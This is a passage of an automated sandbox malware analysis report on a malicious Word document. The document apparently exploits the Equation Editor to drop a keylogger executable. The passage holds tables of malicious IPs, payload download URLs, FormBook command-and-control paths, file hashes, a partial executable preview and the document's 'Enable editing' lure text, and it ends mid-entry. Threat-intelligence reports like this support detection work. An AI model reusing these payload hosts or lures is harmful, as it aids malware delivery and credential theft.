                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                  • VT rate limit hit for: na.doc

                                                                                                                                                                                  Simulations

                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  03:37:25API Interceptor265x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                                                  03:37:29API Interceptor80x Sleep call for process: ihbgfbin.exe modified
                                                                                                                                                                                  03:37:35API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                                                                                                                  03:37:38API Interceptor6724x Sleep call for process: explorer.exe modified
                                                                                                                                                                                  03:37:39API Interceptor12892634x Sleep call for process: mstsc.exe modified

                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                  IPs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  13.248.213.45firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.248.213.45/
                                                                                                                                                                                  irlsever.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.microsofr.fun/omnp/
                                                                                                                                                                                  Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • bizvegan.com/
                                                                                                                                                                                  Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                                                                                                                                                                                  • www.osbornesargent.co.uk/md49/
                                                                                                                                                                                  87.120.84.38na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/pgTQ4mfZBbJhpdd.exe
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/pKL9HXcZosWfPt1.exe
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/qHbynE8Vgwabsy3.exe
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/CLLPdgxhnmwGf5Y.exe
                                                                                                                                                                                  Proforma Invoice347.docGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/gseTC3ENkK2egL4.exe
                                                                                                                                                                                  Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/f2rPs6mHkljoAcH.exe
                                                                                                                                                                                  na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/SXYQ5lPZwknTuMP.exe
                                                                                                                                                                                  na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/ixsT7yV1KrQcQ4E.exe
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/1SccExdhYCwi9NS.exe
                                                                                                                                                                                  na.docGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38/txt/MnXcvVpLaWYuiO.exe
                                                                                                                                                                                  68.66.226.117LPOH2401-3172(Mr.Kem Sophea)-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?E2MXNj=Aqp/nEcilvTl9R8aQsSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj1JjExYXO0x&bt-=XVJdUxa8
                                                                                                                                                                                  https://l.wl.co/l?u=http://mercedes.krisliu.homes/eE9HQTEsVE9XRVIsMCwsMCwsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • mercedes.krisliu.homes/_meetups/r.php?click_id=TOWER&country_code=ro&user_agent=web&ip_address=81.181.57.74&user_lp=imonetizeit
                                                                                                                                                                                  4wnssyl130.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?GzuD=Aqp/nEcilvTl9R8aQsSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj5wvldYAIogC0vuGw==&ArH=M2MxwHKpo
                                                                                                                                                                                  REF-10113128.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?glX0D0=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&SBZ=w884VlJHidf4vn
                                                                                                                                                                                  nellyzx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?3fKt=-ZZhER_hvZV4&Q87xgDQX=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hgVzzVRgNpV2
                                                                                                                                                                                  s6hzASJHMG.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?X2MxX2=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj5wvldYAIogC0vuGw==&l0GP=9r3hKLVp
                                                                                                                                                                                  HBXTWbhD3l.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?ZJEHa2=9rWhZDNX&Ht=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hj5JwU9bOe0nC0vpVA==
                                                                                                                                                                                  tihldYrCBU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?2dtd7DI=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hgVzzVRgNpV2&8p=8pQHW
                                                                                                                                                                                  bolazx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • www.fcno30.com/btrd/?W4=Aqp/nEdT5YSVgRllMcSBDZbXY4IaYVD9lzyUqtxRnGbdcDcQ0nsRc+I3hgVzzVRgNpV2&5jK=EL0dqTlXxPK8I

                                                                                                                                                                                  Domains

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  SHARCOM-ASBGna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                                                                                                                  • 87.120.84.39
                                                                                                                                                                                  Proforma Invoice347.docGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  A2HOSTINGUShttp://mhmgc.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 85.187.128.10
                                                                                                                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                  • 104.218.10.254
                                                                                                                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.255.192.7
                                                                                                                                                                                  Bill Of Lading_MEDUVB935991.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 68.66.226.116
                                                                                                                                                                                  TT Swift copy1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 66.198.240.15
                                                                                                                                                                                  mirai.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 68.66.247.81
                                                                                                                                                                                  AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 68.66.226.116
                                                                                                                                                                                  https://keysmix.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 209.124.66.8
                                                                                                                                                                                  bIb2gpepKH.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 162.254.255.6
                                                                                                                                                                                  PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 66.198.240.15
                                                                                                                                                                                  AMAZON-02USfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                  • 13.32.99.66
                                                                                                                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                  Order pdf.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                  • 185.166.143.49
                                                                                                                                                                                  Proforma Fatura ektedir.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                  • 185.166.143.49
                                                                                                                                                                                  Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                  • 52.217.116.65
                                                                                                                                                                                  SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 108.137.225.79
                                                                                                                                                                                  Proforma Fatura ektedir.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                  • 185.166.143.50
                                                                                                                                                                                  Order Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                  • 185.166.143.48
                                                                                                                                                                                  B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 18.140.171.43
                                                                                                                                                                                  vHnFyxemFf.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 18.182.10.178

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  No context

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  No context

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4q0pGnqqpgTTSL7[1].exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):662016
                                                                                                                                                                                  Entropy (8bit):7.943111027493155
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:INaDPw1Qk89Tmya4B/wP1mlYz5zdTpndwFPVw5XZdZi0pZvSrP7+2xO:IULw9gTFygYjdeFPVw5XFi6Zvv2xO
                                                                                                                                                                                  MD5:6A39668F48A502DBFA3CC13C7F463281
                                                                                                                                                                                  SHA1:00D040A6A3125FA7D929BF7930BC3088D9761B91
                                                                                                                                                                                  SHA-256:1331A8B126688B8C66B1B6A349502D7E7814B4F765C752440C756C90F0E9AE07
                                                                                                                                                                                  SHA-512:8514CF235A04E4ACDB71E3C0FC89702B60A62413ED25AE4695B8AA17A373E6C45D5EB7E193523E4B47406001ADEB92D165AB3C1C69B424A057C69C535E0F7894
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d.!g..............0.................. ... ....@.. .......................`............@.....................................O.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B........................H........q...g...............D...........................................0...........(......(.....+..*...0...........(.......(.....+..*..0...........(........(.....+..*.0...........(.........(.....+..*....0...........(...........(.....+..*..0...........(.............(.....+..*....0.................(.......(.....+..*....0.................(........(.....+..*...0.................(.........(.....+..*..0.................(...........( ....+..*....0.................(.............(!.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{543080F1-6ACA-4A7A-9279-875599102085}.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                                                                                  SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                                                                                  SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                                                                                  SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DB7BB40F-0C2E-47B2-B425-799BEAB45B59}.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                                  Entropy (8bit):1.3537739773049609
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbg:IiiiiiiiiifdLloZQc8++lsJe1Mzz
                                                                                                                                                                                  MD5:EBCDBE016B17501963F7C202AFE63BEC
                                                                                                                                                                                  SHA1:AF7AFA0CB70DFB8467CCEE44830C69433EFD1C51
                                                                                                                                                                                  SHA-256:670AFD41732C36769EFAB8CAF4CFD330D945B378FE659E3D6D2680155FA94D87
                                                                                                                                                                                  SHA-512:6A2877A0B4593C3F828F3410BEED2F4E9D11821E146B6AB15BADC1AA42CA3AC27EFBE809D05BA63E2BE06AE5C1C40E062DF0B09B3A4C454BA12E46933241CBFF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E7B21753-11AB-4008-8617-6E8AEEEB606B}.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1024
                                                                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E93F3014-D774-4716-B703-31FE7E6367A9}.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):868352
                                                                                                                                                                                  Entropy (8bit):3.40390270485409
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:myemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryem:S
                                                                                                                                                                                  MD5:DBA27F8A6C89E226B96F1C55C23B7695
                                                                                                                                                                                  SHA1:6B04EE0BB9734557DBD63DB9ADD63C7EA9F3E9D4
                                                                                                                                                                                  SHA-256:F14E43C7063E719D9266F8DCA1A434D8CDF709B08DA294CFCF2239DDA3FC7606
                                                                                                                                                                                  SHA-512:7269A4D4B80298EF03F0ADCD07451C809C6CF65B3C16066389C5FD3A0762A8B5F8F99792067E98F9F7CA995D2A8ADA57762B885D965DD0DC3B72DCBACE3CBF5E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:8.3.7.4.4.0.6.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\fhucv053.rrw.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\zfjdguxk.xia.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:Generic INItialization configuration [folders]
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):38
                                                                                                                                                                                  Entropy (8bit):4.195295934496219
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:M19m42Uv:M9
                                                                                                                                                                                  MD5:85AFAECA1F119568BFA70BB4ED76F108
                                                                                                                                                                                  SHA1:13DA0EB4D0361D0A4CD1DD38DBECA56DEB273457
                                                                                                                                                                                  SHA-256:3211DF2212BAF22DF462140F37EC16A81483BFB4DE4796F24A0708390601F0F8
                                                                                                                                                                                  SHA-512:4E5C577D753BF15471DA27D3EEE34FCE86E388414FA1177E3BCF877827C82750F23C8EDB64B83CF7E55C69D5FCB2BD18941E81A353F8458A0685D358C1E9D3A6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[doc]..na.LNK=0..[folders]..na.LNK=0..

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\na.LNK

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Wed Oct 30 06:37:24 2024, length=1189943, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                  Entropy (8bit):4.546344517361014
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:8aCvb0E0gXg/XAlCPCHaXxB4fB/qPX+WcVu3ImicvbWI8DtZ3YilMMEpxRljKVTQ:8aCvdk/XThe4ouYeCDDv3q857u
                                                                                                                                                                                  MD5:9CD911BAD0DE07567B178A065D408D15
                                                                                                                                                                                  SHA1:F3E70FEDAB118BE8D0C30AD30920362FE119FA21
                                                                                                                                                                                  SHA-256:D45DC9024A9ED99B0E73D763C0B0B2DAAEB43B05E90EF7288D9CF80FEC33F8E2
                                                                                                                                                                                  SHA-512:CE1C906CF3DA2DD15D1DAED3219A0F777CA61E2F450CE5C250937815E8F8A317A7CB21BC2710BA6D6F159E1E468EFC6A49174E5F7EEF8FE0BCFC57A19D600083
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L..................F.... ....x..r....x..r...(}...*..7(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....^Y.<..user.8......QK.X^Y.<*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2.7(..^Y.< .na.doc..:.......WE..WE.*.........................n.a...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\na.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.a...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:vrJlaCkWtVyhGlvAhuWhlkf9ln:vdsCkWtl6hnlOl
                                                                                                                                                                                  MD5:804390E644FA0474477DF3E9CF0D414F
                                                                                                                                                                                  SHA1:DD3A35414FDE3DA61F605290145BBF4C16C3F3F7
                                                                                                                                                                                  SHA-256:8B776BAF7BB823DACC0EC849005404DC9485B8B628B47EAF9017DE8CDB8650D3
                                                                                                                                                                                  SHA-512:35915649801D7E8BCD5F5571DBF9209BB6E2FE370C518529C8FDA60ED9EA1E253FF0C1F1C197ADD2429A8FDB3B9A5A06C7B2EFEA14B613964720AD9CD057FF25
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\ihbgfbin.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):662016
